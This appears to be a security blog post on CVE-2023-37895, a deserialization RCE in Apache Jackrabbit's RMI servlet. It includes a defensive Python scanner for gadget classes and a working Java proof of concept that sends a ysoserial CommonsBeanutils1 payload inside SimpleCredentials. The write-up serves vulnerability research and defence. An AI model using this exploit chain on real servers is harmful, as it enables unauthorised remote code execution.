source link: https://y4er.com/posts/cve-2023-37895-apache-jackrabbit-rmi-rce/
CVE-2023-37895: Apache Jackrabbit RMI RCE

2023-07-28 · about 408 words · estimated reading time 1 minute
This post was last updated on 2023-07-28; its contents may be out of date.

https://lists.apache.org/thread/j03b3qdhborc2jrhdc4d765d3jkh8bfw


The vulnerable spot has already been pointed out: RMI over HTTP.

org.apache.jackrabbit.servlet.remote.RemoteBindingServlet


The key question is how to exploit it. According to the documentation at https://jackrabbit.apache.org/archive/wiki/JCR/RemoteAccess_115513494.html, JcrUtils can be used to obtain a Repository; given an HTTP URL, what you get back is a URLRemoteRepository.


The Repository interface has several methods; among them, login takes a javax.jcr.Credentials parameter.


This interface has two implementing classes.

One of them, SimpleCredentials, holds a HashMap of type <String, Object> for its attributes.


So the CommonsBeanutils (cb) serialized payload can be placed into that HashMap and sent.
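From the defender's side, the same property is what makes a malicious login visible: the Java serialization stream that carries a SimpleCredentials object names every class it instantiates, so a captured login call can be scanned for classes that have no business inside a credentials object. The script below is an added example for this post, not code from the original article or from the Jackrabbit project. It extracts class names that follow the TC_CLASSDESC tag of the Java serialization format and flags known gadget classes; the sample stream it scans is constructed (descriptor tokens laid out in sequence, not a full valid stream), the gadget denylist is illustrative, and the allowlist of classes expected in a SimpleCredentials login is an assumption.

```python
"""Scan a captured byte blob for a Java serialization stream and list the
classes it references, flagging known deserialization gadget classes.

Added example for defenders; not part of the original post or of Jackrabbit.
The gadget denylist, the expected-class allowlist and the sample stream below
are constructed for illustration.
"""
import re
import struct

JAVA_SERIAL_MAGIC = b"\xac\xed\x00\x05"   # STREAM_MAGIC + STREAM_VERSION
TC_CLASSDESC = 0x72                        # tag that precedes a class name

# Class names used by widely published ysoserial chains (CommonsBeanutils1,
# CommonsCollections*). Illustrative denylist, not exhaustive.
GADGET_CLASSES = {
    "org.apache.commons.beanutils.BeanComparator",
    "org.apache.commons.collections.functors.InvokerTransformer",
    "org.apache.commons.collections4.functors.InvokerTransformer",
}

# Classes a Repository.login(SimpleCredentials) call legitimately needs.
# This allowlist is an assumption made for the example.
EXPECTED_LOGIN_CLASSES = {
    "javax.jcr.SimpleCredentials",
    "java.util.HashMap",
    "java.lang.String",
}

# Lookahead so that every 0x72 byte is considered, even inside an earlier match.
_CLASSDESC_RE = re.compile(rb"(?=\x72(.{2}))", re.DOTALL)
_CLASSNAME_RE = re.compile(rb"^[A-Za-z_$][A-Za-z0-9_$.\[;]*$")


def is_java_serialized(data: bytes) -> bool:
    """True when the blob starts with the Java serialization magic."""
    return data.startswith(JAVA_SERIAL_MAGIC)


def extract_class_names(data: bytes) -> list:
    """Return class names that follow a TC_CLASSDESC tag, in stream order.

    The tag byte is also the letter 'r', so it occurs inside ordinary data;
    each candidate is validated against its 2-byte length prefix and a Java
    class-name pattern before being accepted.
    """
    names, seen = [], set()
    for m in _CLASSDESC_RE.finditer(data):
        (length,) = struct.unpack(">H", m.group(1))
        if length == 0 or length > 512:
            continue
        start = m.start() + 3                 # skip tag byte and length
        candidate = data[start:start + length]
        if len(candidate) == length and _CLASSNAME_RE.match(candidate):
            name = candidate.decode("ascii")
            if name not in seen:
                seen.add(name)
                names.append(name)
    return names


def find_gadget_classes(class_names) -> list:
    """Subset of class_names that appear in the gadget denylist."""
    return [n for n in class_names if n in GADGET_CLASSES]


def inspect_blob(data: bytes) -> dict:
    """Summarise a captured blob: is it a Java serialization stream, which
    classes does it reference, which are known gadgets, and which are simply
    unexpected for a credentials object."""
    if not is_java_serialized(data):
        return {"serialized": False, "classes": [], "gadgets": [], "unexpected": []}
    classes = extract_class_names(data)
    return {
        "serialized": True,
        "classes": classes,
        "gadgets": find_gadget_classes(classes),
        "unexpected": [c for c in classes if c not in EXPECTED_LOGIN_CLASSES],
    }


def _class_desc(name: str) -> bytes:
    """Constructed TC_CLASSDESC token: tag, 2-byte length, name, 8-byte
    serialVersionUID placeholder. Used only to build the sample below."""
    encoded = name.encode("ascii")
    return bytes([TC_CLASSDESC]) + struct.pack(">H", len(encoded)) + encoded + b"\x00" * 8


# Constructed sample (not a real capture): magic followed by three
# TC_OBJECT/TC_CLASSDESC tokens, the last one naming a gadget class.
SAMPLE_LOGIN_STREAM = (
    JAVA_SERIAL_MAGIC
    + b"\x73" + _class_desc("javax.jcr.SimpleCredentials")
    + b"\x73" + _class_desc("java.util.HashMap")
    + b"\x73" + _class_desc("org.apache.commons.beanutils.BeanComparator")
)

if __name__ == "__main__":
    for key, value in inspect_blob(SAMPLE_LOGIN_STREAM).items():
        print(f"{key}: {value}")
```

A hit in `gadgets` or `unexpected` is an indicator for triage, not a fix: class-name matching can be bypassed by chains the denylist does not know, and an allowlist like the one above may need extending for legitimate clients. The remediation is the vendor fix from the advisory thread linked at the top of the post.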

Add the dependencies to pom.xml:

<dependencies>
    <dependency>
        <groupId>javax.jcr</groupId>
        <artifactId>jcr</artifactId>
        <version>2.0</version>
    </dependency>
    <!-- https://mvnrepository.com/artifact/org.apache.jackrabbit/jackrabbit-jcr-rmi -->
    <dependency>
        <groupId>org.apache.jackrabbit</groupId>
        <artifactId>jackrabbit-jcr-rmi</artifactId>
        <version>2.21.10</version>
    </dependency>
    <dependency>
        <groupId>org.apache.jackrabbit</groupId>
        <artifactId>jackrabbit-jcr2dav</artifactId>
        <version>2.0-beta6</version>
    </dependency>
    <dependency>
        <groupId>org.slf4j</groupId>
        <artifactId>slf4j-simple</artifactId>
        <version>1.5.8</version>
    </dependency>
</dependencies>

Build the deserialization payload and send it:

package org.example;

import org.apache.jackrabbit.commons.JcrUtils;
import ysoserial.payloads.CommonsBeanutils1;

import javax.jcr.Repository;
import javax.jcr.SimpleCredentials;


public class Main {
    public static void main(String[] args) throws Exception {
        SimpleCredentials simpleCredentials = new SimpleCredentials("1", "1".toCharArray());
        simpleCredentials.setAttribute("a", new CommonsBeanutils1().getObject("calc"));

        Repository repository = JcrUtils.getRepository("http://localhost:8080/rmi");
        repository.login(simpleCredentials);
    }
}

RCE achieved, for the record.


My writing is poor, the wording flippant, the content shallow and my technique rusty. Corrections and guidance from the masters are welcome; many thanks.

